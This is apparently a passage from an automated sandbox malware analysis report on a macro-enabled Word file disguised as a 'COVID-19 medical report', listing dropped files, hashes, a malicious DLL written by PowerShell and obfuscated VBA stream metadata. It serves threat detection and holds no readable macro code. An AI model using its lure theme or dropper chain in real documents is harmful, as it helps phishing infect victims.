                            SHA-512:C85DE2B094523B0E7FCB0645058A9A674298462C94EB4B0C0082A95E4F265AC1611F0FC3CF20EDA19F23C0BC34FB26056E66DC0321E687B5D42F9627B6E22F8E
                            Malicious:false
                            Reputation:low
                            Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\GT-9333 Medical report COVID-19.LNK
                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Tue Dec 22 05:12:36 2020, length=207360, window=hide
                            Category:dropped
                            Size (bytes):2238
                            Entropy (8bit):4.559132121398516
                            Encrypted:false
                            SSDEEP:48:8b/XT0jFSR/7Le/7JEe/kFQh2b/XT0jFSR/7Le/7JEe/kFQ/:8b/XojF+3eye8FQh2b/XojF+3eye8FQ/
                            MD5:BB933C011697B1828578FE39DAF18FB1
                            SHA1:9DF64ECDF234058D2BAE2149EB03A37A1B13F967
                            SHA-256:280E7105475D5BD73F0A426B8A7C2564C60704586B72622545A5741162C3BCBD
                            SHA-512:4725BB0137F2316F2CE2478EDA700AA5B156DE0D34D67B27BACDAF9FEFD505059D60E266F5C0FFD6B400FE45BDC1131617FDD5539E64F089338CD701EB88D372
                            Malicious:false
                            Reputation:low
                            Preview: L..................F.... .....{....{..;.wq)....*...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..*...Q.1 .GT-933~1.DOC..t.......Q.y.Q.y*...8.....................G.T.-.9.3.3.3. .M.e.d.i.c.a.l. .r.e.p.o.r.t. .C.O.V.I.D.-.1.9...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\648351\Users.user\Desktop\GT-9333 Medical report COVID-19.doc.:.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.G.T.-.9.3.3.3. .M.e.d.i.c.a.l. .r.e.p.o.r.t. .C.O.V.I.D.-.1.9...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1
                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):131
                            Entropy (8bit):4.92469244841743
                            Encrypted:false
                            SSDEEP:3:M1foABMGELQSjmIfFu4o6zwoABMGELQSjmIfFu4omX1foABMGELQSjmIfFu4ov:M1oFGELyIfj+oFGELyIfjXoFGELyIfjy
                            MD5:E675D2BB4E10919CC2B25DEA7E5BCAB0
                            SHA1:CFC91419F3061FAF9AD996E223372873573D4AB8
                            SHA-256:D0214A686B330A75FDDB09844588642CD3B6A4DFBE50575192CA60A9B51B15E4
                            SHA-512:2E5AEE8F05BAAC4CC6EE992848BA10DE81F2F58E5591C328CAC8CB7340062CD19B24D619AE2AD4C9CB95146629F4735953F5E1488673BC8116795D5BA1ACE110
                            Malicious:false
                            Reputation:low
                            Preview: [doc]..GT-9333 Medical report COVID-19.LNK=0..GT-9333 Medical report COVID-19.LNK=0..[doc]..GT-9333 Medical report COVID-19.LNK=0..
                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):162
                            Entropy (8bit):2.431160061181642
                            Encrypted:false
                            SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                            MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                            SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                            SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                            SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C5EXUK8NUVGJWY1Z9OMU.temp
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):8016
                            Entropy (8bit):3.5888104176416076
                            Encrypted:false
                            SSDEEP:96:chQCsMqiqvsqvJCwofz8hQCsMqiqvsEHyqvJCworlzvlYfHAf8OslUVxIu:cyvofz8yTHnorlzvPf8OZIu
                            MD5:A5FFB19B3323ED00CD99D236209D022B
                            SHA1:B7C40FD2BE05AB0BCDADDF5B76CA8CB3B6011BAD
                            SHA-256:3F3FA46DBB7D0C093AA0367B29D74B36CDC9DADCD3A9CBD1F56D01EBE70CC7BA
                            SHA-512:429ADD27FD1351CF6111C4A087C08C34FBA094776221E7C5A710C03832665167BD05B2B644E24D0C592D6935F00D1A4C3FF6DFCE03A6FD6ECA218431BD382D28
                            Malicious:false
                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                            C:\Users\user\Desktop\~$-9333 Medical report COVID-19.doc
                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):162
                            Entropy (8bit):2.431160061181642
                            Encrypted:false
                            SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                            MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                            SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                            SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                            SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                            Malicious:false
                            Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                            C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):227328
                            Entropy (8bit):7.10489493062974
                            Encrypted:false
                            SSDEEP:3072:KDk0aD2Sxtltn5TbX4pkzlcQY70Zc2sdQFAYWYxHT1GaH5sD5/pJz9Zixie:iZaDfbhbX4pKlcRLYDHT1R+D5/jBZi
                            MD5:6ED0E9AA2A905308FA2CEB8D6446302F
                            SHA1:8959D4E97BAF338AF03BF7F79B963AAB3FEC35E1
                            SHA-256:A206269CBFFB5344C77F6B885A04AD00CF1679E9ACE928A3E6DE041001263E96
                            SHA-512:B9AC27AC40ECF658CEA3A62C0A6CE5D91249528FB5CB82B56FD390A6DE63546AFD2C975A05CF058D5C48FC10D8FF94E8A74D7FBC291D6D1D5A573753C9DEF6A8
                            Malicious:true
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ET...5..5..5..gH..5..g^.d5..gY.+5.&..5..5..5..gW..5..gO..5..gI..5..gL..5.Rich.5.................PE..L......_...........!................m3..................................................................................I.......<.... ...l..............................................................@...............D............................text...W........................... ..`.rdata..)-..........................@..@.data...x,..........................@....rsrc....l... ...n..................@..@.reloc..d............^..............@..B........................................................................................................................................................................................................................................................................................................................

                            Static File Info

                            General

                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: National Gorgeous Handcrafted Rubber Chicken Identity transmitting Metal Tasty, Author: Clment Leroy, Template: Normal.dotm, Last Saved By: Victor Lemoine, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 21 13:51:00 2020, Last Saved Time/Date: Mon Dec 21 13:51:00 2020, Number of Pages: 1, Number of Words: 5943, Number of Characters: 33877, Security: 8
                            Entropy (8bit):6.406228458869238
                            TrID:
                            • Microsoft Word document (32009/1) 54.23%
                            • Microsoft Word document (old ver.) (19008/1) 32.20%
                            • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                            File name:GT-9333 Medical report COVID-19.doc
                            File size:207259
                            MD5:a111ce91bd895c36fa2573483ddba7ef
                            SHA1:d4ef1a6f54d64ec0398fac3a2f3e2694d7ed8cb5
                            SHA256:f2ebfaec6ca0aeaf9fca020147398f74d7500b6be6259fc2eb4bb2e968e0cafe
                            SHA512:7c987a24ebeefa27323172cf9c6410768d4bed18a95e063b274ebe42c9fea065d0674d3dcdc877b68cffa2ecc7778d7f8b234786b74cd31b71ee322233066f72
                            SSDEEP:3072:MD9ufstRUUKSns8T00JSHUgteMJ8qMD7g5Gk5UbPoU2l65gsaTM:Y9ufsfgIf0pLrUbPoU2lIgsaTM
                            File Content Preview:........................>.......................9...........<...............6...7...8..........................................................................................................................................................................

                            File Icon

                            Icon Hash:e4eea2aaa4b4b4a4

                            Static OLE Info

                            General

                            Document Type:OLE
                            Number of OLE Files:1

                            OLE File "GT-9333 Medical report COVID-19.doc"

                            Indicators

                            Has Summary Info:True
                            Application Name:Microsoft Office Word
                            Encrypted Document:False
                            Contains Word Document Stream:True
                            Contains Workbook/Book Stream:False
                            Contains PowerPoint Document Stream:False
                            Contains Visio Document Stream:False
                            Contains ObjectPool Stream:
                            Flash Objects Count:
                            Contains VBA Macros:True

                            Summary

                            Code Page:1252
                            Title:
                            Subject:National Gorgeous Handcrafted Rubber Chicken Identity transmitting Metal Tasty
                            Author:Clment Leroy
                            Keywords:
                            Comments:
                            Template:Normal.dotm
                            Last Saved By:Victor Lemoine
                            Revion Number:1
                            Total Edit Time:0
                            Create Time:2020-12-21 13:51:00
                            Last Saved Time:2020-12-21 13:51:00
                            Number of Pages:1
                            Number of Words:5943
                            Number of Characters:33877
                            Creating Application:Microsoft Office Word
                            Security:8

                            Document Summary

                            Document Code Page:1252
                            Number of Lines:282
                            Number of Paragraphs:79
                            Thumbnail Scaling Desired:False
                            Company:
                            Contains Dirty Links:False
                            Shared Document:False
                            Changed Hyperlinks:False
                            Application Version:983040

                            Streams with VBA

                            VBA File Name: UserForm1, Stream Size: -1
                            General
                            Stream Path:Macros/UserForm1
                            VBA File Name:UserForm1
                            Stream Size:-1
                            Data ASCII:
                            Data Raw:

                            VBA Code Keywords

                            Keyword
                            VB_Exposed
                            Attribute
                            VB_Name
                            VB_Creatable
                            VB_PredeclaredId
                            VB_GlobalNameSpace
                            VB_Base
                            VB_Customizable
                            False
                            VB_TemplateDerived
                            VBA Code
                            VBA File Name: UserForm2, Stream Size: -1
                            General
                            Stream Path:Macros/UserForm2
                            VBA File Name:UserForm2
                            Stream Size:-1
                            Data ASCII:
                            Data Raw:

                            VBA Code Keywords

                            Keyword
                            False
                            VB_Exposed
                            Attribute
                            VB_Name
                            VB_Creatable
                            VB_PredeclaredId
                            VB_GlobalNameSpace
                            VB_Base
                            VB_Customizable
                            VB_TemplateDerived
                            VBA Code
                            VBA File Name: UserForm3, Stream Size: -1
                            General
                            Stream Path:Macros/UserForm3
                            VBA File Name:UserForm3
                            Stream Size:-1
                            Data ASCII:
                            Data Raw:

                            VBA Code Keywords

                            Keyword
                            False
                            VB_Exposed
                            Attribute
                            VB_Name
                            VB_Creatable
                            VB_PredeclaredId
                            VB_Base
                            VB_Customizable
                            VB_TemplateDerived
                            VB_GlobalNameSpace
                            VBA Code
                            VBA File Name: UserForm4, Stream Size: -1
                            General
                            Stream Path:Macros/UserForm4
                            VBA File Name:UserForm4
                            Stream Size:-1
                            Data ASCII:
                            Data Raw:

                            VBA Code Keywords

                            Keyword
                            False
                            VB_Exposed
                            Attribute
                            VB_Name
                            VB_Creatable
                            VB_PredeclaredId
                            VB_GlobalNameSpace
                            VB_Customizable
                            VB_TemplateDerived
                            VB_Base
                            VBA Code
                            VBA File Name: UserForm5, Stream Size: -1
                            General
                            Stream Path:Macros/UserForm5
                            VBA File Name:UserForm5
                            Stream Size:-1
                            Data ASCII:
                            Data Raw:

                            VBA Code Keywords

                            Keyword
                            False
                            VB_Exposed
                            Attribute
                            VB_Name
                            VB_Creatable
                            VB_PredeclaredId
                            VB_GlobalNameSpace
                            VB_Base
                            VB_Customizable
                            VB_TemplateDerived
                            VBA Code
                            VBA File Name: Dk5att0cu_9jsb, Stream Size: 1114
                            General
                            Stream Path:Macros/VBA/Dk5att0cu_9jsb
                            VBA File Name:Dk5att0cu_9jsb
                            Stream Size:1114
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . T 7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 11 c0 54 37 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                            VBA Code Keywords

                            Keyword
                            False
                            Private
                            VB_Exposed
                            Attribute
                            VB_Creatable
                            VB_Name
                            Document_open()
                            VB_Customizable
                            VB_PredeclaredId
                            VB_GlobalNameSpace
                            VB_Base
                            VB_TemplateDerived
                            VBA Code
                            VBA File Name: Lxvinhyq0hu0i, Stream Size: 16887
                            General
                            Stream Path:Macros/VBA/Lxvinhyq0hu0i
                            VBA File Name:Lxvinhyq0hu0i
                            Stream Size:16887
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:01 16 01 00 00 f0 00 00 00 8c 08 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 93 08 00 00 1f 30 00 00 00 00 00 00 01 00 00 00 11 c0 34 97 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                            VBA Code Keywords

                            Keyword
                            "cBBImVFtj.VfOyHcZeG.KTQGJQv"
                            MVKdEA
                            "iYrsMDeBF.SIoiFJ.zdnAB"
                            "cfmqZH.yHFfXEyD.iUezXEC"
                            TFhBESFIX
                            yqztDCl:
                            VBA.Replace
                            jSGTCFaK:
                            hVRJE
                            "HGXMmlZoZ.jEXaTVE.zeocvMGG"
                            RZyrFJ
                            sbVXlJE:
                            aDFRF
                            KAedr
                            "ObyEHIBL.hGKABcIQ.yeYrFAOmg"
                            RMyrFd
                            qLfbCLdC
                            GLxLQDxBB
                            KiOKSNEG:
                            PrigNJEs
                            nCWvB
                            RhecDCNb:
                            YaqiI
                            yDuIa
                            aDFRF:
                            Binary
                            hckCCJvD:
                            UbSMfKFUj
                            CtmaxWDYG
                            dcClB:
                            VipWJ:
                            jSGTCFaK
                            IpXGAFACy
                            jWIUH
                            yqztDCl
                            "aguCEDpx.XlUcBUj.UPogGhX"
                            "zSasAJg.LDOIU.vvZOFJ"
                            "AtMXEHJGF.tPVXDfJI.vNeXEIF"
                            wVgZExzI
                            "gtvUAW.KeNGGlEDI.FCFXBEHbH"
                            hkpqEBd
                            FEJNFPMF
                            uYPoFiE
                            XvETIO
                            pxMXSJrIc:
                            dcClB
                            VIuzQOE:
                            "zpGvEhCHv.ZNcWIJcU.qeFzJB"
                            "gEMlED.skZhEggk.ZyWBD"
                            FzSmxUBI:
                            IIJMEYBZ
                            JubeVI
                            "QWkiJ.sNlBSC.hsUWFP"
                            BRfTAJ
                            lOYxmwBA
                            IIJMEYBZ:
                            UFEneAQF
                            FzOAw
                            "eKLzaJBKG.eCACJBH.NfdiGiC"
                            Resume
                            iAKfBEDC:
                            QqQRUOBIy
                            "nRpjIJ.tkIcCAbCF.hJzbH"
                            yHCsJFACD
                            lfjdHL
                            mxDIrHC
                            hckCCJvD
                            DxojDGC
                            rDIcxFB:
                            NwlcQEELI
                            eYojg
                            JXblRBK:
                            kaqktK
                            olbDbIA:
                            nCWvB:
                            "bfJqAKr.cLEdAF.oYWiAFEQ"
                            lbHAbDF:
                            ZqNrvaa:
                            kmOCpG
                            FoTWuD:
                            ChrW(wdKeyS)
                            bVAPDAD
                            "ZbLbn.FiqyBGPC.ROWoCHF"
                            cHoJJlDBJ
                            "CXrJJB.OBfnW.uqEngDYV"
                            "BpfOu.TVoTOHe.EzrPEDJ"
                            "rqFdfCgk.WuMsFCHq.wYpcBKVBP"
                            ObUqEpuD:
                            NwlcQEELI:
                            "pJlGBGe.jIXSWL.jkAfAEIf"
                            "hSzhx.onZqBBzG.aRYCE"
                            VB_Name
                            AJXECAN
                            ZxZNGGUBd:
                            IaIuovC:
                            WnWcBBeF
                            IaIuovC
                            "TNqlmI.VQzWNlJC.IuleF"
                            gvnNjywC:
                            "ErIlZF.tHbIE.idUJKwuOi"
                            oVlMEI
                            NJlsEIS
                            JxVVF
                            RWlYF
                            "ZFWwdLJFE.FcQNSnyB.yuKyrJAD"
                            "KeuGF.APuwUHxl.GiUhBFB"
                            fGzqP:
                            uJknJZHFB:
                            yJzxGZak
                            PksXIAC:
                            "obWgmFILu.KLSrfFHDI.nylpN"
                            "AcrzGL.zwvmHG.MqsxCr"
                            UbSMfKFUj:
                            kmOCpG:
                            "XIjXFFFIJ.jYAPtLTyj.PLtLFT"
                            Attribute
                            lfRjBXXFA:
                            lfRjBXXFA
                            fGzqP
                            VIuzQOE
                            RMyrFd:
                            JXblRBK
                            YEAwF
                            nhVWCG:
                            "BiUfo.vtUVwAWGC.hUSLqGGIO"
                            MVKdEA:
                            "oScEJFIH.GpYhI.ZPvpk"
                            iZGGBKjGH
                            "DcfnrACC.XeVEC.QdSVCUJ"
                            ohdoz
                            uJtiAP
                            "WWmJGCEWG.XCrNGJ.ficHzH"
                            cIiApH
                            LjVfJ
                            qLfbCLdC:
                            zHYrT
                            sbVXlJE
                            sCwjljF
                            JHGODJK
                            XvETIO:
                            BrrXfI
                            JzcNByvAX
                            "DbRqLDGCg.nxwYCaF.sZZrJ"
                            nmHtBKNIA
                            uJknJZHFB
                            kMzKEr:
                            pxMXSJrIc
                            "pPiJFZzI.dfizGxy.NRcSrA"
                            KiOKSNEG
                            SEnkGD
                            "nYskWX.aOSpmAFIB.kCBksCD"
                            "gjoHAq.pgiDH.iYppCzD"
                            HMJCGGAMi
                            "RSIiW.JGdvBjSmB.WubTFJ"
                            xuAPcBl
                            xuAPcBl:
                            jJMCQJDB:
                            nhVWCG
                            LjVfJ:
                            zHYrT:
                            kMzKEr
                            lbHAbDF
                            "YNveE.qehAq.fHHuGb"
                            "eHqqE.nCeMDET.kZWuQGE"
                            ZuuLFE
                            EhrmhuB
                            "NhKID.SYBhRIEGg.qCLeaM"
                            "NPkiDT.CkfBJvJ.bgnwZAB"
                            "fNHCB.hbEBBG.feKiwC"
                            IGamxCG
                            ZuuLFE:
                            jWIUH:
                            "MiwKq.hkWsDcI.YmoTAGR"
                            "NgFRIFlFQ.imXZAJE.tzzlC"
                            RhecDCNb
                            nmHtBKNIA:
                            WpdDxhHa
                            VipWJ
                            PksXIAC
                            String
                            gvnNjywC
                            eTuZIDG
                            kySRBFED
                            ObUqEpuD
                            uWAjsYwtG
                            FzSmxUBI
                            YEAwF:
                            "dcEwJD.cZCpC.kfXrIC"
                            FEJNFPMF:
                            "uozeDEQ.xTczzpJbJ.GKYoFkDTH"
                            "NipqJ.tIztQI.WMXjaJ"
                            yDuIa:
                            IpXGAFACy:
                            "qKjdvEDq.lYfhW.eTVwADADD"
                            yDAMCG
                            ZqNrvaa
                            TLfxGCa
                            EiViHgGI
                            IJSGH
                            iAKfBEDC
                            TFhBESFIX:
                            GwJXIC
                            Error
                            "dZEvHBM.HWisMo.kLMoA"
                            "OqezBEGR.dKnPpE.XZiNID"
                            dThRBEAv
                            rDIcxFB
                            JKIoD
                            cIiApH:
                            QyqGnByH
                            ahjNCC
                            yDAMCG:
                            Close
                            jJMCQJDB
                            "WWgXBJbAL.psfjJF.iosTZOn"
                            yHCsJFACD:
                            ZxZNGGUBd
                            Function
                            FoTWuD
                            hVRJE:
                            "dCIAJyHr.uGSFGCFE.hgENI"
                            olbDbIA
                            OXtlEDLCd
                            zoqaA
                            "UqHHHBQRG.wPBFeBYHC.BFGBerA"
                            "cklcdFF.ljzQFAII.yhDYGICo"
                            VBA Code
                            VBA File Name: UserForm1, Stream Size: 1160
                            General
                            Stream Path:Macros/VBA/UserForm1
                            VBA File Name:UserForm1
                            Stream Size:1160
                            Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 6e ff 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                            VBA Code Keywords

                            Keyword
                            VB_Exposed
                            Attribute
                            VB_Name
                            VB_Creatable
                            VB_PredeclaredId
                            VB_GlobalNameSpace
                            VB_Base
                            VB_Customizable
                            False
                            VB_TemplateDerived
                            VBA Code
                            VBA File Name: UserForm2, Stream Size: 1155
                            General
                            Stream Path:Macros/VBA/UserForm2
                            VBA File Name:UserForm2
                            Stream Size:1155
                            Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 a8 f8 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                            VBA Code Keywords

                            Keyword
                            False
                            VB_Exposed
                            Attribute
                            VB_Name
                            VB_Creatable
                            VB_PredeclaredId
                            VB_GlobalNameSpace
                            VB_Base
                            VB_Customizable
                            VB_TemplateDerived
                            VBA Code
                            VBA File Name: UserForm3, Stream Size: 1159
                            General
                            Stream Path:Macros/VBA/UserForm3
                            VBA File Name:UserForm3
                            Stream Size:1159
                            Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . ^ I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 5e 49 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                            VBA Code Keywords

                            Keyword
                            False
                            VB_Exposed
                            Attribute
                            VB_Name
                            VB_Creatable
                            VB_PredeclaredId
                            VB_Base
                            VB_Customizable
                            VB_TemplateDerived
                            VB_GlobalNameSpace
                            VBA Code
                            VBA File Name: UserForm4, Stream Size: 1160
                            General
                            Stream Path:Macros/VBA/UserForm4
                            VBA File Name:UserForm4
                            Stream Size:1160
                            Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 57 91 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                            VBA Code Keywords

                            Keyword
                            False
                            VB_Exposed
                            Attribute
                            VB_Name
                            VB_Creatable
                            VB_PredeclaredId
                            VB_GlobalNameSpace
                            VB_Customizable
                            VB_TemplateDerived
                            VB_Base
                            VBA Code
                            VBA File Name: UserForm5, Stream Size: 1160
                            General
                            Stream Path:Macros/VBA/UserForm5
